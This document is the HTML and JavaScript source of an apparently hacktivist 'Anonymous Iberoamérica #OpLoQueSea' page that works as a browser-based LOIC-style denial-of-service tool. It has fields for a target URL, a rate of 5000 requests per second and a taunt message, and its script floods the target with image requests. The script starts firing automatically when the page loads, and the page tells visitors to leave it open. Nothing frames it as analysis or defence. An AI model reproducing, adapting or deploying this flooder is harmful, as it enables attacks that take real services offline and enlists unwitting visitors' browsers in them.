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  8. <title>#OpLoQueSea - Webhive</title>
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  70. <div style="width:1100px; overflow:hidden; padding-top:4px; float:left">
  71. <div id="loic" style="z-index:10; width:1100px; margin-bottom:20px; height:770px;">
  72. <div style="margin-left:auto; margin-right:auto">
  73. <h1>Anonymous Iberoamérica #OpLoQueSea<br />
  74. Deja esta página abierta<br /></h1>
  75. <p><div style="position: relative; width: 752px; height: 100%; left: -177px; top: 11px;">
  76. <div style="width: 490px; height: 331px; position: absolute; left: 186px; top: -15px;">
  77. <img alt="LOIC" src="" width="979" height="482" /></div>
  78. <div style="width: 323px; height: 73px; position: absolute; left: 427px; top: -1px;">
  79. <fieldset style="width: 100%; height: 100%;">
  80. <legend>1. Selecciona Target</legend>
  81. <label>URL:<br />
  82. <input name="xD" id="targetURL" style="width: 100%;" value=""/>
  83. </label>
  84. <legend></legend>
  85. </fieldset>
  86. </div>
  87. <div style="width: 240px; height: 100px; position: absolute; left: 876px; top: -8px;">
  88. <fieldset style="width: 100%; height: 100%;">
  89. <legend>3. Listo?</legend>
  90. <button id="fireButton" style="background-color:#FF9900; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255); width: 240px; height: 70px;"> Dejar de Disparar! </button>
  91. </fieldset>
  92. </div>
  93. <div style="width: 685px; height: 140px; position: absolute; left: 404px; top: 110px;">
  94. <fieldset style="width: 100%; height: 100%;">
  95. <legend>2. Opciones de ataque</legend>
  96. <label><span id="result_box"><span title="Requests per second">Peticiones por segundo</span></span>: <input style="width: 40px;" id="rps" value="5000" /></label>
  97. <label>Mensaje:<br />
  98. <input id="message" style="width: 100%;" value="Somos Anonymous, Somos Legión, No perdonamos, No olvidamos, Esperanos! Anonymous Iberoamérica" />
  99. </label>
  100. </fieldset>
  101. <div style="width: 676px; height: 163px; position: absolute; left: 0px; top: 167px;">
  102. <fieldset style="width: 100%; height: 100%;">
  103. <legend>Status de ataque</legend>
  104. <dl>
  105. <dt>Solicitudes:</dt>
  106. <dd class="Estilo4" id="requestedCtr">0</dd>
  107. <dt>Logros:</dt>
  108. <dd class="Estilo3" id="succeededCtr">0</dd>
  109. <dt>Fallidos:</dt>
  110. <dd class="Estilo2" id="failedCtr">0</dd>
  111. </dl>
  112. </fieldset>
  113. </div>
  114. </div>
  115. </div>
  116. <script>
  117. (function () {
  118. var fireInterval;
  119. var isFiring = false;
  120. var currentTime = new Date()
  121. var lastSuccess = currentTime.getTime();
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  123. succeededCtrNode = document.getElementById("succeededCtr"),
  124. failedCtrNode = document.getElementById("failedCtr"),
  125. targetURLNode = document.getElementById("targetURL"),
  126. fireButton = document.getElementById("fireButton"),
  127. messageNode = document.getElementById("message"),
  128. rpsNode = document.getElementById("rps"),
  129. timeoutNode = document.getElementById("timeout");
  130. var targetURL = targetURLNode.value;
  131. targetURLNode.onchange = function () {
  132. targetURL = this.value;
  133. };
  135. var requestsHT = {}; // requests hash table, may come in handy later
  136. var requestedCtr = 0,
  137. succeededCtr = 0,
  138. failedCtr = 0;
  140. var makeHttpRequest = function () {
  141. if ( (currentTime.getTime()-lastSuccess) > 10000) { //Allow no more than 1000 hung requests
  142. return;
  143. } else { lastSuccess = currentTime.getTime();};
  144. var rID =Number(new Date());
  145. var img = new Image();
  146. img.onerror = function () { onFail(rID); };
  147. img.onabort = function () { onFail(rID); };
  148. img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
  149. img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
  150. requestsHT[rID] = img;
  151. onRequest(rID);
  152. };
  154. var onRequest = function (rID) {
  155. requestedCtr++;
  156. requestedCtrNode.innerHTML = requestedCtr;
  157. };
  158. var onComplete = function (rID) {
  159. delete requestsHT[rID];
  160. };
  161. var onFail = function (rID) {
  162. // failedCtr++;
  163. //failedCtrNode.innerHTML = failedCtr;
  164. succeededCtr++; //Seems like the url will always fail it it isn't an image
  165. succeededCtrNode.innerHTML = succeededCtr;
  166. delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser
  167. };
  168. var onSuccess = function (rID) {
  169. succeededCtr++;
  170. succeededCtrNode.innerHTML = succeededCtr;
  171. delete requestsHT[rID];
  172. };
  174. fireButton.onclick = function () {
  175. if (isFiring) {
  176. clearInterval(fireInterval);
  177. isFiring = false;
  178. this.innerHTML = "Disparar Otra Vez!";
  179. } else {
  180. isFiring = true;
  181. this.innerHTML = "Dejar de Disparar!";
  182. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
  183. }
  184. };
  186. function FireIbero() {
  187. if (isFiring) {
  188. clearInterval(fireInterval);
  189. isFiring = false;
  190. this.innerHTML = "Disparar Otra Vez!";
  191. } else {
  192. isFiring = true;
  193. this.innerHTML = "Stop flooding";
  194. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
  195. }
  196. };
  198. document.getElementById("targetURL").value = "";
  200. FireIbero();
  201. })();
  202. </script>
  203. </p></div>
  204. </div>
  205. </div>
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